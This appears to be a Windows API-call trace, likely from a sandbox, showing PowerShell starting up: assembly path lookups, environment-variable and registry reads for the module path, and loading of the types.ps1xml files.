	[0332.456] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0332.456] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad2b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0332.456] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0332.456] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0332.459] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0332.459] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0332.459] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0332.459] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0333.776] SetConsoleCtrlHandler (HandlerRoutine=0x2c068dc, Add=1) returned 1
	[0334.589] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x30c
	[0334.591] CoCreateGuid (in: pguid=0x1ad8d0 | out: pguid=0x1ad8d0*(Data1=0x5e4b9f0a, Data2=0xace, Data3=0x4e58, Data4=([0]=0x94, [1]=0x30, [2]=0x2d, [3]=0xa, [4]=0xe, [5]=0xde, [6]=0xe0, [7]=0x7f))) returned 0x0
	[0334.592] CoTaskMemAlloc (cb=0x104) returned 0x468180
	[0334.592] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x468180, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0334.593] CoTaskMemFree (pv=0x468180) 
	[0334.598] WinSqmIsOptedIn () returned 0x0
	[0334.598] CoTaskMemAlloc (cb=0x104) returned 0x468180
	[0334.598] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x468180, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0334.599] CoTaskMemFree (pv=0x468180) 
	[0334.599] CoTaskMemAlloc (cb=0x104) returned 0x468180
	[0334.599] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x468180, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0334.599] CoTaskMemFree (pv=0x468180) 
	[0334.600] CoTaskMemAlloc (cb=0x104) returned 0x468180
	[0334.600] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x468180, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0334.600] CoTaskMemFree (pv=0x468180) 
	[0334.601] CoTaskMemAlloc (cb=0x104) returned 0x468180
	[0334.601] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x468180, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0334.601] CoTaskMemFree (pv=0x468180) 
	[0334.601] CoTaskMemAlloc (cb=0x104) returned 0x468180
	[0334.601] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x468180, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0334.601] CoTaskMemFree (pv=0x468180) 
	[0334.603] CoTaskMemAlloc (cb=0x104) returned 0x468180
	[0334.603] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x468180, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0334.603] CoTaskMemFree (pv=0x468180) 
	[0334.603] CoTaskMemAlloc (cb=0x104) returned 0x468180
	[0334.603] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x468180, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0334.603] CoTaskMemFree (pv=0x468180) 
	[0334.604] CoTaskMemAlloc (cb=0x104) returned 0x468180
	[0334.604] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x468180, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0334.604] CoTaskMemFree (pv=0x468180) 
	[0334.606] CoTaskMemAlloc (cb=0x104) returned 0x468180
	[0334.606] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x468180, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0334.606] CoTaskMemFree (pv=0x468180) 
	[0334.610] CoTaskMemAlloc (cb=0x104) returned 0x468180
	[0334.610] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x468180, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0334.610] CoTaskMemFree (pv=0x468180) 
	[0334.610] CoTaskMemAlloc (cb=0x104) returned 0x468180
	[0334.610] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x468180, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0334.612] CoTaskMemFree (pv=0x468180) 
	[0334.612] CoTaskMemAlloc (cb=0x104) returned 0x468180
	[0334.612] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x468180, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0334.612] CoTaskMemFree (pv=0x468180) 
	[0335.622] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1acd20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0335.622] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1acc70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0335.622] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1acc70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0335.622] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1acc70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0336.117] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1acd20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0336.117] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1acc70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0336.117] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1acc70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0336.118] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1acd20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0336.118] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1acc70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0336.118] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1acc70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0336.119] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1acd20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0336.119] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1acc70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0336.119] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1acc70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0336.119] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1acd20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0336.119] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1acc70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0336.120] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1acc70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0336.543] CoTaskMemAlloc (cb=0x104) returned 0x468180
	[0336.543] GetEnvironmentVariableW (in: lpName="PSMODULEPATH", lpBuffer=0x468180, nSize=0x80 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x33
	[0336.543] CoTaskMemFree (pv=0x468180) 
	[0336.545] CoTaskMemAlloc (cb=0xcc) returned 0x1b82b680
	[0336.545] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x1b82b680, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0336.545] CoTaskMemFree (pv=0x1b82b680) 
	[0336.545] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad448 | out: phkResult=0x1ad448*=0x310) returned 0x0
	[0336.545] RegQueryValueExW (in: hKey=0x310, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x1ad3cc, lpData=0x0, lpcbData=0x1ad3c8*=0x0 | out: lpType=0x1ad3cc*=0x2, lpData=0x0, lpcbData=0x1ad3c8*=0x6c) returned 0x0
	[0336.546] CoTaskMemAlloc (cb=0x70) returned 0x41a0e0
	[0336.546] RegQueryValueExW (in: hKey=0x310, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x1ad39c, lpData=0x41a0e0, lpcbData=0x1ad398*=0x6c | out: lpType=0x1ad39c*=0x2, lpData="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpcbData=0x1ad398*=0x6c) returned 0x0
	[0336.546] CoTaskMemFree (pv=0x41a0e0) 
	[0336.546] CoTaskMemAlloc (cb=0xcc) returned 0x1b82b680
	[0336.546] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%", lpDst=0x1b82b680, nSize=0x64 | out: lpDst="C:\\Windows") returned 0xb
	[0336.546] CoTaskMemFree (pv=0x1b82b680) 
	[0336.546] CoTaskMemAlloc (cb=0xcc) returned 0x1b82b680
	[0336.546] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x1b82b680, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0336.546] CoTaskMemFree (pv=0x1b82b680) 
	[0336.550] RegCloseKey (hKey=0x310) returned 0x0
	[0336.550] CoTaskMemAlloc (cb=0xcc) returned 0x1b82b680
	[0336.550] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x1b82b680, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0336.550] CoTaskMemFree (pv=0x1b82b680) 
	[0336.550] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad448 | out: phkResult=0x1ad448*=0x310) returned 0x0
	[0336.550] RegQueryValueExW (in: hKey=0x310, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x1ad3cc, lpData=0x0, lpcbData=0x1ad3c8*=0x0 | out: lpType=0x1ad3cc*=0x0, lpData=0x0, lpcbData=0x1ad3c8*=0x0) returned 0x2
	[0336.550] RegCloseKey (hKey=0x310) returned 0x0
	[0336.555] CoTaskMemAlloc (cb=0x20c) returned 0x464280
	[0336.556] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x464280 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0336.557] CoTaskMemFree (pv=0x464280) 
	[0336.557] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x1acfd0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0336.558] SetEnvironmentVariableW (lpName="PSMODULEPATH", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 1
	[0336.560] CoTaskMemAlloc (cb=0x104) returned 0x468180
	[0336.560] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x468180, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0336.560] CoTaskMemFree (pv=0x468180) 
	[0336.561] CoTaskMemAlloc (cb=0x104) returned 0x468180
	[0336.561] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x468180, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0336.561] CoTaskMemFree (pv=0x468180) 
	[0336.563] CoTaskMemAlloc (cb=0x104) returned 0x468180
	[0336.563] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x468180, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0336.563] CoTaskMemFree (pv=0x468180) 
	[0336.563] CoTaskMemAlloc (cb=0x104) returned 0x468180
	[0336.563] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x468180, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0336.563] CoTaskMemFree (pv=0x468180) 
	[0336.566] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad238 | out: phkResult=0x1ad238*=0x318) returned 0x0
	[0336.566] RegQueryValueExW (in: hKey=0x318, lpValueName="path", lpReserved=0x0, lpType=0x1ad24c, lpData=0x0, lpcbData=0x1ad248*=0x0 | out: lpType=0x1ad24c*=0x1, lpData=0x0, lpcbData=0x1ad248*=0x74) returned 0x0
	[0336.567] RegQueryValueExW (in: hKey=0x318, lpValueName="path", lpReserved=0x0, lpType=0x1ad1bc, lpData=0x0, lpcbData=0x1ad1b8*=0x0 | out: lpType=0x1ad1bc*=0x1, lpData=0x0, lpcbData=0x1ad1b8*=0x74) returned 0x0
	[0336.567] CoTaskMemAlloc (cb=0x78) returned 0x41a0e0
	[0336.567] RegQueryValueExW (in: hKey=0x318, lpValueName="path", lpReserved=0x0, lpType=0x1ad18c, lpData=0x41a0e0, lpcbData=0x1ad188*=0x74 | out: lpType=0x1ad18c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0x1ad188*=0x74) returned 0x0
	[0336.567] CoTaskMemFree (pv=0x41a0e0) 
	[0336.567] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0x1acf00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a
	[0336.567] SetErrorMode (uMode=0x1) returned 0x1
	[0336.568] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x1ad110 | out: lpFileInformation=0x1ad110*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80093051, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1dba44b2, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1dba44b2, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0336.568] SetErrorMode (uMode=0x1) returned 0x1
	[0336.570] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x1acf00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0336.570] SetErrorMode (uMode=0x1) returned 0x1
	[0336.570] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1ad110 | out: lpFileInformation=0x1ad110*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d6d2bb, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d6d2bb, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe8e83beb, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1
	[0336.570] SetErrorMode (uMode=0x1) returned 0x1
	[0336.575] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x1acf00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0336.575] SetErrorMode (uMode=0x1) returned 0x1
	[0336.575] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1ad110 | out: lpFileInformation=0x1ad110*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe968c5bf, ftCreationTime.dwHighDateTime=0x1c9ea0b, ftLastAccessTime.dwLowDateTime=0xe968c5bf, ftLastAccessTime.dwHighDateTime=0x1c9ea0b, ftLastWriteTime.dwLowDateTime=0xe968c5bf, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x291b4)) returned 1
	[0336.575] SetErrorMode (uMode=0x1) returned 0x1
	[0336.576] CoTaskMemAlloc (cb=0x104) returned 0x468180
	[0336.576] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x468180, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0336.576] CoTaskMemFree (pv=0x468180) 
	[0336.578] CoTaskMemAlloc (cb=0x104) returned 0x468180
	[0336.578] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x468180, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0336.578] CoTaskMemFree (pv=0x468180) 
	[0336.578] GetACP () returned 0x4e4
	[0336.586] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x1acac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0336.586] SetErrorMode (uMode=0x1) returned 0x1
	[0336.586] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x31c
	[0336.587] GetFileType (hFile=0x31c) returned 0x1
	[0336.587] SetErrorMode (uMode=0x1) returned 0x1
	[0336.587] GetFileType (hFile=0x31c) returned 0x1
	[0336.588] ReadFile (in: hFile=0x31c, lpBuffer=0x2e271e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad048, lpOverlapped=0x0 | out: lpBuffer=0x2e271e0*, lpNumberOfBytesRead=0x1ad048*=0x1000, lpOverlapped=0x0) returned 1
	[0336.590] ReadFile (in: hFile=0x31c, lpBuffer=0x2e271e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad048, lpOverlapped=0x0 | out: lpBuffer=0x2e271e0*, lpNumberOfBytesRead=0x1ad048*=0x1000, lpOverlapped=0x0) returned 1
	[0336.590] ReadFile (in: hFile=0x31c, lpBuffer=0x2e271e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad048, lpOverlapped=0x0 | out: lpBuffer=0x2e271e0*, lpNumberOfBytesRead=0x1ad048*=0x1000, lpOverlapped=0x0) returned 1
	[0337.025] ReadFile (in: hFile=0x31c, lpBuffer=0x2e271e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad048, lpOverlapped=0x0 | out: lpBuffer=0x2e271e0*, lpNumberOfBytesRead=0x1ad048*=0xcf3, lpOverlapped=0x0) returned 1
	[0337.026] ReadFile (in: hFile=0x31c, lpBuffer=0x2e2663b, nNumberOfBytesToRead=0x30d, lpNumberOfBytesRead=0x1ad048, lpOverlapped=0x0 | out: lpBuffer=0x2e2663b*, lpNumberOfBytesRead=0x1ad048*=0x0, lpOverlapped=0x0) returned 1
	[0337.026] ReadFile (in: hFile=0x31c, lpBuffer=0x2e271e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad048, lpOverlapped=0x0 | out: lpBuffer=0x2e271e0*, lpNumberOfBytesRead=0x1ad048*=0x0, lpOverlapped=0x0) returned 1
	[0337.028] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x1acd60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0337.028] SetErrorMode (uMode=0x1) returned 0x1
